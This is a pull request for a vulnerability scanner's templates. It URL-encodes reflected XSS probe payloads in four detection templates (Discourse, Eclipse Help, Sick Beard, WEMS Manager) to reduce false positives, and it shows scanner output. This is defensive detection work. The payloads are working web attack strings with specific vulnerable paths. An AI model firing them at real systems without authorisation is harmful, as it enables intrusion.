### PR TITLE
False positive on XSS templates

### DIFF
--- a/vulnerabilities/discourse-xss.yaml
+++ b/vulnerabilities/discourse-xss.yaml
@@ -9,7 +9,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\"><svg/onload=alert(1337)>'
+      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
     matchers-condition: and
     matchers:
       - type: status

--- a/vulnerabilities/eclipse-help-system-xss.yaml
+++ b/vulnerabilities/eclipse-help-system-xss.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/help/index.jsp?view=<script>alert(document.cookie)</script>"
+      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
     matchers-condition: and
     matchers:
       - type: status

--- a/vulnerabilities/sick-beard-xss.yaml
+++ b/vulnerabilities/sick-beard-xss.yaml
@@ -12,7 +12,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/config/postProcessing/testNaming?pattern=<svg/onload=alert(document.domain)>"
+      - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
     matchers-condition: and
     matchers:
       - type: status

--- a/vulnerabilities/wems-manager-xss.yaml
+++ b/vulnerabilities/wems-manager-xss.yaml
@@ -12,7 +12,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/guest/users/forgotten?email="><script>confirm(document.domain)</script>'
+      - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E'
     matchers-condition: and
     matchers:
       - type: status


### PR DESCRIPTION
Encode XSS payload to prevent false positives when the Query string is returned AS IS by the server. Recent browsers will always send the parameters encoded.


```
$ echo https://example.com/html/?x= | /home/buggie/go/bin/nuclei -t sick-beard-xss.yaml -t discourse-xss.yaml -t wems-manager-xss.yaml -t eclipse-help-system-xss.yaml

                       __     _
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ /
   / / / / /_/ / /__/ /  __/ /
  /_/ /_/\__,_/\___/_/\___/_/   v2.1

                projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] [eclipse-help-system-xss] Loaded template Eclipse Help System RXSS vulnerability (@pikpikcu) [medium]
[INF] [discourse-xss] Loaded template Discourse CMS - XSS (@madrobot) [medium]
[INF] [wems-manager-xss] Loaded template WEMS Enterprise Manager XSS (@pikpikcu) [medium]
[INF] [sick-beard-xss] Loaded template Sick Beard XSS (@pikpikcu) [medium]
[eclipse-help-system-xss] [http] https://example.com/html/?x=/help/index.jsp?view=%%3Cscript%%3Ealert(document.cookie)%%3C/script%%3E
[discourse-xss] [http] https://example.com/html/?x=/email/unsubscribed?email=test@gmail.com%%27\%%22%%3E%%3Csvg/onload=alert(1337)%%3E
[wems-manager-xss] [http] https://example.com/html/?x=/guest/users/forgotten?email=%%22%%3E%%3Cscript%%3Econfirm(document.domain)%%3C/script%%3E
[sick-beard-xss] [http] https://example.com/html/?x=/config/postProcessing/testNaming?pattern=%%3Csvg/onload=alert(document.domain)%%3E
```